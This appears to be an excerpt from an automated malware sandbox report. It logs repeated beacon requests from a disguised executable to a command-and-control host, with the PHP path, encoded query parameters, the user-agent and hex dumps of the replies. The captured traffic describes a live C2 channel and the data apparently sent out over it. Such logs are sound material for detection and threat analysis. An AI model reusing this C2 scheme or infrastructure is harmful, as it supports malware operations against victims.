                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.449743188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:12:21.171314955 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:12:21.914422989 CEST731INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:21 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZUxN6arH%2BRA9tUswXwC5E0SL%2FFoGlJg2OhdqL%2FjnPHKI2Bjnwi9l9eWOkZDIt5%2FYABJVtnqkjAHAmgKxGP3tEKbLUV1PxSMwvmAiuw%2FpoTPJZmHzot6oSw5CEtOtrRjBfyw%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8e1acbf8431a-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.449744188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:12:26.937011003 CEST2107OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:12:27.670838118 CEST727INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:27 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xIHSQsWZAFJ3h9ZWYhEdBR%2FYj17KEoCbbles1Qig2%2FuDstIan1RlAnb5Cix8RA82w%2B0iJfzzJ4nZmsJtUmhWKXDP1mk8Tr2grfhKXGruhBZzShKv6cxHMi4ZheN0Smgn2RE%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8e3eda14c360-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.449745188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:12:32.686731100 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:12:33.417253971 CEST729INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:33 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vurY3Hk2F3Kf%2B8S9AzywRtoKX0u1wlVo7RUKL0eOvvYIh7uWUOzzdMSwDJatg6XjpJ%2BRmagBH%2FuZhas0UunwSXL0VfDNPQirOw2qHqxoMADxSVZ7%2FhKaUIYQrDDcN1fy2lY%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8e62daa0c344-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              10192.168.2.449746188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:12:38.452549934 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:12:39.199090004 CEST731INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:39 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nEWlpnstr7NmLMzODjdADCMIc44duqxcoHbTR9bUxX0BfSfKim1TKfW%2BsGvPC6Hnm8e%2BBVbub%2FRmv00hznyGJUt99NnGw0uI%2BGtbL4rhP5x0kibIB6wOE7iTBB9%2F6ZxwG0c%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8e86eb34424a-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              11192.168.2.449747188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:12:44.386066914 CEST2080OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=d1nIiojIkNmMkNjZzM2MjZGO3MTO4EWNkVWYyQDZ4EzMzUjZjJmIsISO3IWYycjY2ADOmBjMiJDOhBzYzMWOjJWMklDM0IjZ4UDM1UDZ3IDNiojIxEjY0QGZzYmYxI2M4QDM1MzN3EWM0EGZkNTN0kjMlFmIsISNwgTZ1ADMihjZjFTNxQGMxkDZyMDOhlzMiJzY5QWOiFGNycjYhFmMiojI1kDZkNTYwYTNiVmM5QGOyMTY5QGMwYmMmZmM1cDOjNmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUa [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:12:45.114552975 CEST731INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:45 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OCs6gLi%2B7x%2BlcS6SFizpIc4rr2YWO5CpTBP04EzUAYJhMdr%2BuLBq3Sl53pgLEzhA34bmODUR7hAtbs3zcZCj9KO%2FfxjaXbr3LpY4WOMop8OFYCF%2Fk5QvLNfcI765ZrjMKSU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8eabe948438d-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              12192.168.2.449749188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:12:50.124222994 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:12:50.861068010 CEST729INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:50 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SachSjczTrEowOqfo4P47tm1mHpuh8%2FNhTsDIbwUuN6fkXmkWH2ds%2F4rbjY4fi6jy8oXRMDwjRI5OVNbx7Gkx9ugqUo8yN%2BKTa8KcMLukr03oaBo0Gyt%2F6iP2fzCg4UNYkU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8ecfcb7bc35e-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              13192.168.2.449750188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:12:55.874167919 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:12:56.610280037 CEST729INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:56 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ASOK3mZm%2BkkRkh1CRO2PbTisAe1o0dmu9oBGqvbdxlzbNJyQP%2B3XflyA1cntmN7nNij9wz7HS4scBzOhQ8WA2cZ6jOJFA8fl2X%2FZYWWf5Uyg8idXwOrBP%2FBwTfJ28aZQnpU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8ef3b9674211-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
